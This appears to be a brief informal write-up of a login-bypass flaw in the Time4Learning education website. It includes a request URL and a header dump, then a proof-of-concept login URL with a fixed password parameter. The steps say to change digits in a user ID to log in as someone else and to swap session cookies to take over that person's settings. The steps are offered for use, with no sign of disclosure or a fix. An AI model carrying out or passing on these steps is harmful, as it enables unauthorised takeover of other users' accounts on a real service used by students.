TImeforlearning Bypass Login

1. TimeForLearning Login Vuln Found By N,
2. (EXPLAIN)
3. U Have to Be Login To a Account to Grab The Header/Red
4. But u Don't Have to be login to Login as someone Else.
5.  
6. This Can Cause Great Harm, Since a Person Could Login to there account, they could Grab there SES ID From Cookie's And Auto Login As that Person,
7.  
8. First U Want To Send a Get Request to : https://www.time4learning.com/App/Dashboards/Upper/#/courses
9.  
10.  
11. {HEADERS}
12. ====================================================================
13. Tue, 12 Nov 2019 16:28:20 GMT
14. content-encoding
15. br
16. cf-cache-status
17. DYNAMIC
18. server
19. cloudflare
20. x-aspnet-version
21. 4.0.30319
22. access-control-allow-origin
23. *
24. x-powered-by
25. expect-ct
26. max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
27. x-pingback
28. content-type
29. text/html; charset=utf-8
30. status
31. 200
32. cache-control
33. private
34. cf-ray
35. 5349e0e138dfec32-MFE
36. link
37. x-ua-compatible
38. IE=11
39. ===================================================================
40. (POC)
41.  
42. Once U See That ur Body Should Pop Up, then look for this text
43. http://www.time4learning.com/Login/Load_CompassLearning.aspx?u=&password=internet
44. u will have a PL id for the username change the last 3 dig to like 800
45. and boom u are login as someone else example
46. EXAMPLE : https://imgur.com/Glu2eLt
47.  
48. also since u are login as someone else u have ther PL ID and the Session Cookie so if u want to control there setting's and such just switch ur cookie's